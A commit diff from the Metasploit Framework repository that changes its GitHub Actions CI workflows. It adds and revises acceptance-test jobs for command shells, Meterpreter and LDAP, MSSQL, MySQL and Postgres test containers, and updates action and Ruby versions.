Fix 404 link in eicar.txt (#19912 )

Updated the link to EICAR's test-file as the old one returns 404
correct password in hashes table (#19911 )
2025-02-27 16:17:10 +00:00 · 2025-02-27 15:15:45 +00:00 · 2025-02-27 14:35:25 +00:00 · 2025-02-27 15:28:27 +01:00 · 2025-02-27 15:25:50 +01:00 · 2025-02-27 03:33:05 -06:00
1490 changed files with 137848 additions and 19656 deletions
@@ -2,4 +2,7 @@ blank_issues_enabled: false
 contact_links:
  - name: Termux Issues?
    url: https://github.com/rapid7/metasploit-framework/issues/11023
-    about: Termux is not officially supported, check here for more info
+    about: Termux is not officially supported, check here for more info
+  - name: Android Payload Issues?
+    url: https://github.com/rapid7/metasploit-framework/issues/19154
+    about: Check here for more info
@@ -1,4 +1,5 @@
-name: Acceptance
+
+name: Command Shell Acceptance

 # Optional, enabling concurrency limits: https://docs.github.com/en/actions/using-jobs/using-concurrency
 #concurrency:
@@ -22,6 +23,16 @@ permissions:
  statuses: none

 on:
+  workflow_dispatch:
+    inputs:
+      metasploitPayloadsCommit:
+        description: 'metasploit-payloads branch you want to test'
+        required: true
+        default: 'master'
+      mettleCommit:
+        description: 'mettle branch you want to test'
+        required: true
+        default: 'master'
  push:
    branches-ignore:
      - gh-pages
@@ -40,6 +51,7 @@ on:
      - 'spec/acceptance/**'
      - 'spec/support/acceptance/**'
      - 'spec/acceptance_spec_helper.rb'
+      - '.github/**'
 #   Example of running as a cron, to weed out flaky tests
 #  schedule:
 #    - cron: '*/15 * * * *'
@@ -51,66 +63,45 @@ jobs:
      fail-fast: false
      matrix:
        os:
-          - macos-11
          - windows-2019
          - ubuntu-20.04
        ruby:
-          - 3.0.2
-        meterpreter:
-          # Python
-          - { name: python, runtime_version: 3.6 }
-          - { name: python, runtime_version: 3.11 }
-
-          # Java - newer versions of Java are not supported currently: https://github.com/rapid7/metasploit-payloads/issues/647
-          - { name: java, runtime_version: 8 }
-
-          # PHP - Temporarily removed as tests are timing out on Github actions
-          # - { name: php, runtime_version: 5.3 }
-          # - { name: php, runtime_version: 7.4 }
-          # - { name: php, runtime_version: 8.2 }
+          - '3.2'
        include:
-          # Windows Meterpreter
-          - { meterpreter: { name: windows_meterpreter }, os: windows-2019 }
-          - { meterpreter: { name: windows_meterpreter }, os: windows-2022 }
+          # Powershell
+          - { command_shell: { name: powershell }, os: windows-2019 }
+          - { command_shell: { name: powershell }, os: windows-2022 }

-          # Mettle
-          - { meterpreter: { name: mettle }, os: macos-11 }
-          - { meterpreter: { name: mettle }, os: ubuntu-20.04 }
+          # Linux
+          - { command_shell: { name: linux }, os: ubuntu-20.04 }
+
+          # CMD
+          - { command_shell: { name: cmd }, os: windows-2019 }
+          - { command_shell: { name: cmd }, os: windows-2022 }

    runs-on: ${{ matrix.os }}

-    timeout-minutes: 25
+    timeout-minutes: 50

    env:
      RAILS_ENV: test
      HOST_RUNNER_IMAGE: ${{ matrix.os }}
-      METERPRETER: ${{ matrix.meterpreter.name }}
-      METERPRETER_RUNTIME_VERSION: ${{ matrix.meterpreter.runtime_version }}
+      SESSION: 'command_shell/${{ matrix.command_shell.name }}'
+      SESSION_RUNTIME_VERSION: ${{ matrix.command_shell.runtime_version }}
+      BUNDLE_WITHOUT: "coverage development"

-    name: ${{ matrix.meterpreter.name }} ${{ matrix.meterpreter.runtime_version }} ${{ matrix.os }}
+    name: ${{ matrix.command_shell.name }} ${{ matrix.command_shell.runtime_version }} ${{ matrix.os }}
    steps:
      - name: Install system dependencies (Linux)
        if: runner.os == 'Linux'
        run: sudo apt-get -y --no-install-recommends install libpcap-dev graphviz

-      - uses: shivammathur/setup-php@6d7209f44a25a59e904b1ee9f3b0c33ab2cd888d
-        if: ${{ matrix.meterpreter.name == 'php' }}
+      - uses: shivammathur/setup-php@fc14643b0a99ee9db10a3c025a33d76544fa3761
+        if: ${{ matrix.command_shell.name == 'php' }}
        with:
-          php-version: ${{ matrix.meterpreter.runtime_version }}
+          php-version: ${{ matrix.command_shell.runtime_version }}
          tools: none

-      - name: Set up Python
-        if: ${{ matrix.meterpreter.name == 'python' }}
-        uses: actions/setup-python@v4
-        with:
-          python-version: ${{ matrix.meterpreter.runtime_version }}
-
-      - uses: actions/setup-java@v3
-        if: ${{ matrix.meterpreter.name == 'java' }}
-        with:
-          distribution: temurin
-          java-version: ${{ matrix.meterpreter.runtime_version }}
-
      - name: Install system dependencies (Windows)
        shell: cmd
        if: runner.os == 'Windows'
@@ -126,23 +117,26 @@ jobs:
          dir %WINDIR%
          type %WINDIR%\\system32\\drivers\\etc\\hosts

-      - name: Checkout code
-        uses: actions/checkout@v3
+      # The job checkout structure is:
+      #  .
+      #  └── metasploit-framework
+
+      - name: Checkout metasploit-framework code
+        uses: actions/checkout@v4
+        with:
+          path: metasploit-framework

      - name: Setup Ruby
        env:
-          BUNDLE_WITHOUT: "coverage development"
          BUNDLE_FORCE_RUBY_PLATFORM: true
        uses: ruby/setup-ruby@v1
        with:
          ruby-version: ${{ matrix.ruby }}
          bundler-cache: true
-          cache-version: 4
-          # Github actions with Ruby requires Bundler 2.2.18+
-          # https://github.com/ruby/setup-ruby/tree/d2b39ad0b52eca07d23f3aa14fdf2a3fcc1f411c#windows
-          bundler: 2.2.33
+          working-directory: metasploit-framework
+          cache-version: 5

-      - name: acceptance
+      - name: Acceptance
        env:
          SPEC_HELPER_LOAD_METASPLOIT: false
          SPEC_OPTS: "--tag acceptance --require acceptance_spec_helper.rb --color --format documentation --format AllureRspec::RSpecFormatter"
@@ -154,15 +148,16 @@ jobs:
        # Note: rspec retry is intentionally not used, as it can cause issues with allure's reporting
        # Additionally - flakey tests should be fixed or marked as flakey instead of silently retried
        run: |
-          bundle exec rspec spec/acceptance/
+          bundle exec rspec spec/acceptance/command_shell_spec.rb
+        working-directory: metasploit-framework

      - name: Archive results
        if: always()
-        uses: actions/upload-artifact@v3
+        uses: actions/upload-artifact@v4
        with:
          # Provide a unique artifact for each matrix os, otherwise race conditions can lead to corrupt zips
-          name: raw-data-${{ matrix.meterpreter.name }}-${{ matrix.meterpreter.runtime_version }}-${{ matrix.os }}
-          path: tmp/allure-raw-data
+          name: raw-data-${{ matrix.command_shell.name }}-${{ matrix.command_shell.runtime_version }}-${{ matrix.os }}
+          path: metasploit-framework/tmp/allure-raw-data

  # Generate a final report from the previous test results
  report:
@@ -173,7 +168,7 @@ jobs:

    steps:
      - name: Checkout code
-        uses: actions/checkout@v3
+        uses: actions/checkout@v4
        if: always()

      - name: Install system dependencies (Linux)
@@ -183,18 +178,14 @@ jobs:
      - name: Setup Ruby
        if: always()
        env:
-          BUNDLE_WITHOUT: "coverage development"
          BUNDLE_FORCE_RUBY_PLATFORM: true
        uses: ruby/setup-ruby@v1
        with:
-          ruby-version: 3.0.2
+          ruby-version: '${{ matrix.ruby }}'
          bundler-cache: true
          cache-version: 4
-          # Github actions with Ruby requires Bundler 2.2.18+
-          # https://github.com/ruby/setup-ruby/tree/d2b39ad0b52eca07d23f3aa14fdf2a3fcc1f411c#windows
-          bundler: 2.2.33

-      - uses: actions/download-artifact@v3
+      - uses: actions/download-artifact@v4
        id: download
        if: always()
        with:
@@ -217,7 +208,7 @@ jobs:

      - name: archive results
        if: always()
-        uses: actions/upload-artifact@v3
+        uses: actions/upload-artifact@v4
        with:
          name: final-report-${{ github.run_id }}
          path: |
@@ -32,7 +32,7 @@ jobs:
  # Ensures that the docs site builds successfully. Note that this workflow does not deploy the docs site.
  build:
    runs-on: ubuntu-latest
-    timeout-minutes: 40
+    timeout-minutes: 60

    strategy:
      fail-fast: true
@@ -43,7 +43,7 @@ jobs:
    name: Ruby ${{ matrix.ruby }}
    steps:
      - name: Checkout code
-        uses: actions/checkout@v3
+        uses: actions/checkout@v4

      - name: Setup Ruby
        uses: ruby/setup-ruby@v1
@@ -195,7 +195,7 @@ jobs:
                  close: true,
                  comment: `
                    Thanks for your contribution to Metasploit Framework! We've looked at this issue, and unfortunately we do not currently have the bandwidth to prioritize this issue.
-            
+
                    We've labeled this as \`attic\` and closed it for now. If you believe this issue has been closed in error, or that it should be prioritized, please comment with additional information.
                  `
                }
@@ -0,0 +1,161 @@
+name: LDAP Acceptance
+
+# Optional, enabling concurrency limits: https://docs.github.com/en/actions/using-jobs/using-concurrency
+#concurrency:
+#  group: ${{ github.ref }}-${{ github.workflow }}
+#  cancel-in-progress: ${{ github.ref != 'refs/heads/main' }}
+
+# https://docs.github.com/en/actions/using-workflows/workflow-syntax-for-github-actions#permissions
+permissions:
+  actions: none
+  checks: none
+  contents: none
+  deployments: none
+  id-token: none
+  issues: none
+  discussions: none
+  packages: none
+  pages: none
+  pull-requests: none
+  repository-projects: none
+  security-events: none
+  statuses: none
+
+on:
+  push:
+    branches-ignore:
+      - gh-pages
+      - metakitty
+  pull_request:
+    branches:
+      - '*'
+    paths:
+      - 'metsploit-framework.gemspec'
+      - 'Gemfile.lock'
+      - '**/**ldap**'
+      - 'spec/acceptance/**'
+      - 'spec/support/acceptance/**'
+      - 'spec/acceptance_spec_helper.rb'
+      - '.github/**'
+#   Example of running as a cron, to weed out flaky tests
+#  schedule:
+#    - cron: '*/15 * * * *'
+
+jobs:
+  ldap:
+    runs-on: ${{ matrix.os }}
+    timeout-minutes: 60
+
+    strategy:
+      fail-fast: true
+      matrix:
+        ruby:
+          - '3.2'
+        os:
+          - ubuntu-latest
+
+    env:
+      RAILS_ENV: test
+      BUNDLE_WITHOUT: "coverage development pcap"
+
+    name: LDAP Acceptance - ${{ matrix.os }} - Ruby ${{ matrix.ruby }}
+    steps:
+      - name: Install system dependencies
+        run: sudo apt-get install -y --no-install-recommends libpcap-dev graphviz
+
+      - name: Checkout code
+        uses: actions/checkout@v4
+
+      - name: Run samba/ldap docker container
+        working-directory: 'test/ldap'
+        run: |
+          docker compose build
+          docker compose up --wait -d
+
+      - name: Setup Ruby
+        env:
+          # Nokogiri doesn't release pre-compiled binaries for preview versions of Ruby; So force compilation with BUNDLE_FORCE_RUBY_PLATFORM
+          BUNDLE_FORCE_RUBY_PLATFORM: "${{ contains(matrix.ruby, 'preview') && 'true' || 'false' }}"
+        uses: ruby/setup-ruby@v1
+        with:
+          ruby-version: '${{ matrix.ruby }}'
+          bundler-cache: true
+
+      - name: acceptance
+        env:
+          SPEC_HELPER_LOAD_METASPLOIT: false
+          SPEC_OPTS: "--tag acceptance --require acceptance_spec_helper.rb --color --format documentation --format AllureRspec::RSpecFormatter"
+          RUNTIME_VERSION: latest
+        # Unix run command:
+        #   SPEC_HELPER_LOAD_METASPLOIT=false bundle exec ./spec/acceptance
+        # Windows cmd command:
+        #   set SPEC_HELPER_LOAD_METASPLOIT=false
+        #   bundle exec rspec .\spec\acceptance
+        # Note: rspec retry is intentionally not used, as it can cause issues with allure's reporting
+        # Additionally - flakey tests should be fixed or marked as flakey instead of silently retried
+        run: |
+          bundle exec rspec spec/acceptance/ldap_spec.rb
+
+      - name: Archive results
+        if: always()
+        uses: actions/upload-artifact@v4
+        with:
+          # Provide a unique artifact for each matrix os, otherwise race conditions can lead to corrupt zips
+          name: ldap-acceptance-${{ matrix.os }}
+          path: tmp/allure-raw-data
+
+  # Generate a final report from the previous test results
+  report:
+    name: Generate report
+    needs:
+      - ldap
+    runs-on: ubuntu-latest
+    if: always()
+
+    steps:
+      - name: Checkout code
+        uses: actions/checkout@v4
+        if: always()
+
+      - name: Install system dependencies (Linux)
+        if: always()
+        run: sudo apt-get -y --no-install-recommends install libpcap-dev graphviz
+
+      - name: Setup Ruby
+        if: always()
+        env:
+          BUNDLE_FORCE_RUBY_PLATFORM: true
+        uses: ruby/setup-ruby@v1
+        with:
+          ruby-version: '${{ matrix.ruby }}'
+          bundler-cache: true
+          cache-version: 4
+
+      - uses: actions/download-artifact@v4
+        id: download
+        if: always()
+        with:
+          # Note: Not specifying a name will download all artifacts from the previous workflow jobs
+          path: raw-data
+
+      - name: allure generate
+        if: always()
+        run: |
+          export VERSION=2.22.1
+
+          curl -o allure-$VERSION.tgz -Ls https://github.com/allure-framework/allure2/releases/download/$VERSION/allure-$VERSION.tgz
+          tar -zxvf allure-$VERSION.tgz -C .
+
+          ls -la ${{steps.download.outputs.download-path}}
+          ./allure-$VERSION/bin/allure generate ${{steps.download.outputs.download-path}}/* -o ./allure-report
+
+          find ${{steps.download.outputs.download-path}}
+          bundle exec ruby tools/dev/report_generation/support_matrix/generate.rb --allure-data ${{steps.download.outputs.download-path}} > ./allure-report/support_matrix.html
+
+      - name: archive results
+        if: always()
+        uses: actions/upload-artifact@v4
+        with:
+          name: final-report-${{ github.run_id }}
+          path: |
+            ./allure-report
@@ -29,13 +29,16 @@ on:
 jobs:
  msftidy:
    runs-on: ubuntu-latest
-    timeout-minutes: 40
+    timeout-minutes: 60
+
+    env:
+      BUNDLE_WITHOUT: "coverage development pcap"

    strategy:
      fail-fast: true
      matrix:
        ruby:
-          - '3.0'
+          - '3.2'

    name: Lint msftidy
    steps:
@@ -43,7 +46,7 @@ jobs:
        run: sudo apt-get install libpcap-dev graphviz

      - name: Checkout code
-        uses: actions/checkout@v3
+        uses: actions/checkout@v4
        # Required to checkout HEAD^ and 3a046f01dae340c124dd3895e670983aef5fe0c5 for the msftidy script
        # https://github.com/actions/checkout/tree/5a4ac9002d0be2fb38bd78e4b4dbde5606d7042f#checkout-head
        with:
@@ -53,8 +56,6 @@ jobs:
        with:
          ruby-version: '${{ matrix.ruby }}'
          bundler-cache: true
-        env:
-          BUNDLE_WITHOUT: "coverage development pcap"

      - name: Run msftidy
        run: |
@@ -0,0 +1,66 @@
+name: Meterpreter Acceptance
+
+# Optional, enabling concurrency limits: https://docs.github.com/en/actions/using-jobs/using-concurrency
+#concurrency:
+#  group: ${{ github.ref }}-${{ github.workflow }}
+#  cancel-in-progress: ${{ github.ref != 'refs/heads/main' }}
+
+# https://docs.github.com/en/actions/using-workflows/workflow-syntax-for-github-actions#permissions
+permissions:
+  actions: none
+  checks: none
+  contents: none
+  deployments: none
+  id-token: none
+  issues: none
+  discussions: none
+  packages: none
+  pages: none
+  pull-requests: none
+  repository-projects: none
+  security-events: none
+  statuses: none
+
+on:
+  workflow_dispatch:
+    inputs:
+      metasploit_payloads_commit:
+        description: 'metasploit-payloads branch you want to test'
+        required: true
+        default: 'master'
+      mettle_commit:
+        description: 'mettle branch you want to test'
+        required: true
+        default: 'master'
+  push:
+    branches-ignore:
+      - gh-pages
+      - metakitty
+  pull_request:
+    branches:
+      - '*'
+    paths:
+      - 'metsploit-framework.gemspec'
+      - 'Gemfile.lock'
+      - 'data/templates/**'
+      - 'modules/payloads/**'
+      - 'lib/msf/core/payload/**'
+      - 'lib/msf/core/**'
+      - 'test/modules/**'
+      - 'tools/dev/**'
+      - 'spec/acceptance/**'
+      - 'spec/support/acceptance/**'
+      - 'spec/acceptance_spec_helper.rb'
+      - '.github/**'
+#   Example of running as a cron, to weed out flaky tests
+#  schedule:
+#    - cron: '*/15 * * * *'
+
+jobs:
+  build:
+    uses: ./.github/workflows/shared_meterpreter_acceptance.yml
+    with:
+      metasploit_payloads_commit: ${{ github.event.inputs.metasploit_payloads_commit }}
+      mettle_commit: ${{ github.event.inputs.mettle_commit }}
+      build_metasploit_payloads: ${{ contains(github.event.pull_request.labels.*.name, 'payload-testing-branch') }}
+      build_mettle: ${{ contains(github.event.pull_request.labels.*.name, 'payload-testing-mettle-branch') }}
@@ -0,0 +1,174 @@
+name: MSSQL Acceptance
+
+# Optional, enabling concurrency limits: https://docs.github.com/en/actions/using-jobs/using-concurrency
+#concurrency:
+#  group: ${{ github.ref }}-${{ github.workflow }}
+#  cancel-in-progress: ${{ github.ref != 'refs/heads/main' }}
+
+# https://docs.github.com/en/actions/using-workflows/workflow-syntax-for-github-actions#permissions
+permissions:
+  actions: none
+  checks: none
+  contents: none
+  deployments: none
+  id-token: none
+  issues: none
+  discussions: none
+  packages: none
+  pages: none
+  pull-requests: none
+  repository-projects: none
+  security-events: none
+  statuses: none
+
+on:
+  push:
+    branches-ignore:
+      - gh-pages
+      - metakitty
+  pull_request:
+    branches:
+      - '*'
+    paths:
+      - 'metsploit-framework.gemspec'
+      - 'Gemfile.lock'
+      - '**/**mssql**'
+      - 'spec/acceptance/**'
+      - 'spec/support/acceptance/**'
+      - 'spec/acceptance_spec_helper.rb'
+      - '.github/**'
+#   Example of running as a cron, to weed out flaky tests
+#  schedule:
+#    - cron: '*/15 * * * *'
+
+jobs:
+  mssql:
+    runs-on: ${{ matrix.os }}
+    timeout-minutes: 60
+
+    services:
+      mssql:
+        image: ${{ matrix.docker_image }}
+        ports: ["1433:1433"]
+        env:
+          MSSQL_SA_PASSWORD: yourStrong(!)Password
+          ACCEPT_EULA: 'Y'
+        options: >-
+          --health-cmd "/opt/mssql-tools18/bin/sqlcmd -U sa -P 'yourStrong(!)Password' -C -Q 'select 1' -b -o /dev/null"
+          --health-interval 10s
+          --health-timeout 5s
+          --health-retries 5
+    strategy:
+      fail-fast: true
+      matrix:
+        ruby:
+          - '3.2'
+        os:
+          - ubuntu-latest
+        docker_image:
+          - mcr.microsoft.com/mssql/server:2022-latest
+          - mcr.microsoft.com/mssql/server:2019-latest
+
+    env:
+      RAILS_ENV: test
+      BUNDLE_WITHOUT: "coverage development pcap"
+
+
+    name: ${{ matrix.docker_image }} - ${{ matrix.os }} - Ruby ${{ matrix.ruby }}
+    steps:
+      - name: Install system dependencies
+        run: sudo apt-get install -y --no-install-recommends libpcap-dev graphviz
+
+      - name: Checkout code
+        uses: actions/checkout@v4
+
+      - name: Setup Ruby
+        env:
+          # Nokogiri doesn't release pre-compiled binaries for preview versions of Ruby; So force compilation with BUNDLE_FORCE_RUBY_PLATFORM
+          BUNDLE_FORCE_RUBY_PLATFORM: "${{ contains(matrix.ruby, 'preview') && 'true' || 'false' }}"
+        uses: ruby/setup-ruby@v1
+        with:
+          ruby-version: '${{ matrix.ruby }}'
+          bundler-cache: true
+
+      - name: Extract runtime version
+        run: |
+          echo "RUNTIME_VERSION=$(echo $DOCKER_IMAGE | awk -F: '{ print $2 }')" >> $GITHUB_ENV
+          echo "DOCKER_IMAGE_FILENAME=$(echo $DOCKER_IMAGE | tr -d '/:')" >> $GITHUB_ENV
+        env:
+          DOCKER_IMAGE: ${{ matrix.docker_image }}
+          OS: ${{ matrix.os }}
+
+      - name: acceptance
+        env:
+          SPEC_HELPER_LOAD_METASPLOIT: false
+          SPEC_OPTS: "--tag acceptance --require acceptance_spec_helper.rb --color --format documentation --format AllureRspec::RSpecFormatter"
+          RUNTIME_VERSION: ${{ env.RUNTIME_VERSION }}
+        # Unix run command:
+        #   SPEC_HELPER_LOAD_METASPLOIT=false bundle exec ./spec/acceptance
+        # Windows cmd command:
+        #   set SPEC_HELPER_LOAD_METASPLOIT=false
+        #   bundle exec rspec .\spec\acceptance
+        # Note: rspec retry is intentionally not used, as it can cause issues with allure's reporting
+        # Additionally - flakey tests should be fixed or marked as flakey instead of silently retried
+        run: |
+          bundle exec rspec spec/acceptance/mssql_spec.rb
+      - name: Archive results
+        if: always()
+        uses: actions/upload-artifact@v4
+        with:
+          # Provide a unique artifact for each matrix os, otherwise race conditions can lead to corrupt zips
+          name: ${{ env.DOCKER_IMAGE_FILENAME }}-${{ matrix.os }}
+          path: tmp/allure-raw-data
+
+  # Generate a final report from the previous test results
+  report:
+    name: Generate report
+    needs:
+      - mssql
+    runs-on: ubuntu-latest
+    if: always()
+
+    steps:
+      - name: Checkout code
+        uses: actions/checkout@v4
+        if: always()
+
+      - name: Install system dependencies (Linux)
+        if: always()
+        run: sudo apt-get -y --no-install-recommends install libpcap-dev graphviz
+
+      - name: Setup Ruby
+        if: always()
+        env:
+          BUNDLE_FORCE_RUBY_PLATFORM: true
+        uses: ruby/setup-ruby@v1
+        with:
+          ruby-version: '${{ matrix.ruby }}'
+          bundler-cache: true
+          cache-version: 4
+
+      - uses: actions/download-artifact@v4
+        id: download
+        if: always()
+        with:
+          # Note: Not specifying a name will download all artifacts from the previous workflow jobs
+          path: raw-data
+
+      - name: allure generate
+        if: always()
+        run: |
+          export VERSION=2.22.1
+          curl -o allure-$VERSION.tgz -Ls https://github.com/allure-framework/allure2/releases/download/$VERSION/allure-$VERSION.tgz
+          tar -zxvf allure-$VERSION.tgz -C .
+          ls -la ${{steps.download.outputs.download-path}}
+          ./allure-$VERSION/bin/allure generate ${{steps.download.outputs.download-path}}/* -o ./allure-report
+          find ${{steps.download.outputs.download-path}}
+          bundle exec ruby tools/dev/report_generation/support_matrix/generate.rb --allure-data ${{steps.download.outputs.download-path}} > ./allure-report/support_matrix.html
+      - name: archive results
+        if: always()
+        uses: actions/upload-artifact@v4
+        with:
+          name: final-report-${{ github.run_id }}
+          path: |
+            ./allure-report
@@ -0,0 +1,177 @@
+name: MySQL Acceptance
+
+# Optional, enabling concurrency limits: https://docs.github.com/en/actions/using-jobs/using-concurrency
+#concurrency:
+#  group: ${{ github.ref }}-${{ github.workflow }}
+#  cancel-in-progress: ${{ github.ref != 'refs/heads/main' }}
+
+# https://docs.github.com/en/actions/using-workflows/workflow-syntax-for-github-actions#permissions
+permissions:
+  actions: none
+  checks: none
+  contents: none
+  deployments: none
+  id-token: none
+  issues: none
+  discussions: none
+  packages: none
+  pages: none
+  pull-requests: none
+  repository-projects: none
+  security-events: none
+  statuses: none
+
+on:
+  push:
+    branches-ignore:
+      - gh-pages
+      - metakitty
+  pull_request:
+    branches:
+      - '*'
+    paths:
+      - 'metsploit-framework.gemspec'
+      - 'Gemfile.lock'
+      - '**/**mysql**'
+      - 'spec/acceptance/**'
+      - 'spec/support/acceptance/**'
+      - 'spec/acceptance_spec_helper.rb'
+      - '.github/**'
+#   Example of running as a cron, to weed out flaky tests
+#  schedule:
+#    - cron: '*/15 * * * *'
+
+jobs:
+  mysql:
+    runs-on: ${{ matrix.os }}
+    timeout-minutes: 60
+
+    services:
+      mysql:
+        image: ${{ matrix.target.version }}
+        ports: ["3306:3306"]
+        env:
+          MYSQL_ROOT_PASSWORD: password
+        options: >-
+          --health-cmd "${{ matrix.target.health_cmd }}"
+          --health-interval 10s
+          --health-timeout 10s
+          --health-retries 5
+    strategy:
+      fail-fast: true
+      matrix:
+        ruby:
+          - '3.2'
+        os:
+          - ubuntu-latest
+        target:
+          - { version: "mariadb:latest", health_cmd: "mariadb -uroot -ppassword -e 'SELECT version()'" }
+          - { version: "mysql:latest", health_cmd: "mysql -uroot -ppassword -e 'SELECT version()'" }
+
+    env:
+      RAILS_ENV: test
+      BUNDLE_WITHOUT: "coverage development pcap"
+
+    name: ${{ matrix.target.version }} - ${{ matrix.os }} - Ruby ${{ matrix.ruby }}
+    steps:
+      - name: Install system dependencies
+        run: sudo apt-get install -y --no-install-recommends libpcap-dev graphviz
+
+      - name: Checkout code
+        uses: actions/checkout@v4
+
+      - name: Setup Ruby
+        env:
+          # Nokogiri doesn't release pre-compiled binaries for preview versions of Ruby; So force compilation with BUNDLE_FORCE_RUBY_PLATFORM
+          BUNDLE_FORCE_RUBY_PLATFORM: "${{ contains(matrix.ruby, 'preview') && 'true' || 'false' }}"
+        uses: ruby/setup-ruby@v1
+        with:
+          ruby-version: '${{ matrix.ruby }}'
+          bundler-cache: true
+
+      - name: Extract runtime version
+        run: |
+          echo "RUNTIME_VERSION=$(echo $DOCKER_IMAGE | awk -F: '{ print $2 }')" >> $GITHUB_ENV
+          echo "DOCKER_IMAGE_FILENAME=$(echo $DOCKER_IMAGE | tr -d ':')" >> $GITHUB_ENV
+        env:
+          DOCKER_IMAGE: ${{ matrix.target.version }}
+          OS: ${{ matrix.os }}
+
+      - name: acceptance
+        env:
+          SPEC_HELPER_LOAD_METASPLOIT: false
+          SPEC_OPTS: "--tag acceptance --require acceptance_spec_helper.rb --color --format documentation --format AllureRspec::RSpecFormatter"
+          RUNTIME_VERSION: ${{ env.RUNTIME_VERSION }}
+        # Unix run command:
+        #   SPEC_HELPER_LOAD_METASPLOIT=false bundle exec ./spec/acceptance
+        # Windows cmd command:
+        #   set SPEC_HELPER_LOAD_METASPLOIT=false
+        #   bundle exec rspec .\spec\acceptance
+        # Note: rspec retry is intentionally not used, as it can cause issues with allure's reporting
+        # Additionally - flakey tests should be fixed or marked as flakey instead of silently retried
+        run: |
+          bundle exec rspec spec/acceptance/mysql_spec.rb
+
+      - name: Archive results
+        if: always()
+        uses: actions/upload-artifact@v4
+        with:
+          # Provide a unique artifact for each matrix os, otherwise race conditions can lead to corrupt zips
+          name: ${{ env.DOCKER_IMAGE_FILENAME }}-${{ matrix.os }}
+          path: tmp/allure-raw-data
+
+  # Generate a final report from the previous test results
+  report:
+    name: Generate report
+    needs:
+      - mysql
+    runs-on: ubuntu-latest
+    if: always()
+
+    steps:
+      - name: Checkout code
+        uses: actions/checkout@v4
+        if: always()
+
+      - name: Install system dependencies (Linux)
+        if: always()
+        run: sudo apt-get -y --no-install-recommends install libpcap-dev graphviz
+
+      - name: Setup Ruby
+        if: always()
+        env:
+          BUNDLE_FORCE_RUBY_PLATFORM: true
+        uses: ruby/setup-ruby@v1
+        with:
+          ruby-version: '${{ matrix.ruby }}'
+          bundler-cache: true
+          cache-version: 4
+
+      - uses: actions/download-artifact@v4
+        id: download
+        if: always()
+        with:
+          # Note: Not specifying a name will download all artifacts from the previous workflow jobs
+          path: raw-data
+
+      - name: allure generate
+        if: always()
+        run: |
+          export VERSION=2.22.1
+
+          curl -o allure-$VERSION.tgz -Ls https://github.com/allure-framework/allure2/releases/download/$VERSION/allure-$VERSION.tgz
+          tar -zxvf allure-$VERSION.tgz -C .
+
+          ls -la ${{steps.download.outputs.download-path}}
+          ./allure-$VERSION/bin/allure generate ${{steps.download.outputs.download-path}}/* -o ./allure-report
+
+          find ${{steps.download.outputs.download-path}}
+          bundle exec ruby tools/dev/report_generation/support_matrix/generate.rb --allure-data ${{steps.download.outputs.download-path}} > ./allure-report/support_matrix.html
+
+      - name: archive results
+        if: always()
+        uses: actions/upload-artifact@v4
+        with:
+          name: final-report-${{ github.run_id }}
+          path: |
+            ./allure-report
@@ -0,0 +1,179 @@
+name: Postgres Acceptance
+
+# Optional, enabling concurrency limits: https://docs.github.com/en/actions/using-jobs/using-concurrency
+#concurrency:
+#  group: ${{ github.ref }}-${{ github.workflow }}
+#  cancel-in-progress: ${{ github.ref != 'refs/heads/main' }}
+
+# https://docs.github.com/en/actions/using-workflows/workflow-syntax-for-github-actions#permissions
+permissions:
+  actions: none
+  checks: none
+  contents: none
+  deployments: none
+  id-token: none
+  issues: none
+  discussions: none
+  packages: none
+  pages: none
+  pull-requests: none
+  repository-projects: none
+  security-events: none
+  statuses: none
+
+on:
+  push:
+    branches-ignore:
+      - gh-pages
+      - metakitty
+  pull_request:
+    branches:
+      - '*'
+    paths:
+      - 'metsploit-framework.gemspec'
+      - 'Gemfile.lock'
+      - '**/**postgres**'
+      - 'spec/acceptance/**'
+      - 'spec/support/acceptance/**'
+      - 'spec/acceptance_spec_helper.rb'
+      - '.github/**'
+#   Example of running as a cron, to weed out flaky tests
+#  schedule:
+#    - cron: '*/15 * * * *'
+
+jobs:
+  postgres:
+    runs-on: ${{ matrix.os }}
+    timeout-minutes: 60
+
+    services:
+      postgres:
+        image: ${{ matrix.docker_image }}
+        ports: ["5432:5432"]
+        env:
+          POSTGRES_USER: postgres
+          POSTGRES_PASSWORD: password
+        options: >-
+          --health-cmd "pg_isready --username postgres"
+          --health-interval 10s
+          --health-timeout 5s
+          --health-retries 5
+
+    strategy:
+      fail-fast: true
+      matrix:
+        ruby:
+          - '3.2'
+        os:
+          - ubuntu-latest
+        docker_image:
+          - postgres:9.4
+          - postgres:16.2
+
+    env:
+      RAILS_ENV: test
+      BUNDLE_WITHOUT: "coverage development pcap"
+
+    name: ${{ matrix.docker_image }} - ${{ matrix.os }} - Ruby ${{ matrix.ruby }}
+    steps:
+      - name: Install system dependencies
+        run: sudo apt-get install -y --no-install-recommends libpcap-dev graphviz
+
+      - name: Checkout code
+        uses: actions/checkout@v4
+
+      - name: Setup Ruby
+        env:
+          # Nokogiri doesn't release pre-compiled binaries for preview versions of Ruby; So force compilation with BUNDLE_FORCE_RUBY_PLATFORM
+          BUNDLE_FORCE_RUBY_PLATFORM: "${{ contains(matrix.ruby, 'preview') && 'true' || 'false' }}"
+        uses: ruby/setup-ruby@v1
+        with:
+          ruby-version: '${{ matrix.ruby }}'
+          bundler-cache: true
+
+      - name: Extract runtime version
+        run: |
+          echo "RUNTIME_VERSION=$(echo $DOCKER_IMAGE | awk -F: '{ print $2 }')" >> $GITHUB_ENV
+          echo "DOCKER_IMAGE_FILENAME=$(echo $DOCKER_IMAGE | tr -d ':')" >> $GITHUB_ENV
+        env:
+          DOCKER_IMAGE: ${{ matrix.docker_image }}
+          OS: ${{ matrix.os }}
+
+      - name: acceptance
+        env:
+          SPEC_HELPER_LOAD_METASPLOIT: false
+          SPEC_OPTS: "--tag acceptance --require acceptance_spec_helper.rb --color --format documentation --format AllureRspec::RSpecFormatter"
+          RUNTIME_VERSION: ${{ env.RUNTIME_VERSION }}
+        # Unix run command:
+        #   SPEC_HELPER_LOAD_METASPLOIT=false bundle exec ./spec/acceptance
+        # Windows cmd command:
+        #   set SPEC_HELPER_LOAD_METASPLOIT=false
+        #   bundle exec rspec .\spec\acceptance
+        # Note: rspec retry is intentionally not used, as it can cause issues with allure's reporting
+        # Additionally - flakey tests should be fixed or marked as flakey instead of silently retried
+        run: |
+          bundle exec rspec spec/acceptance/postgres_spec.rb
+
+      - name: Archive results
+        if: always()
+        uses: actions/upload-artifact@v4
+        with:
+          # Provide a unique artifact for each matrix os, otherwise race conditions can lead to corrupt zips
+          name: ${{ env.DOCKER_IMAGE_FILENAME }}-${{ matrix.os }}
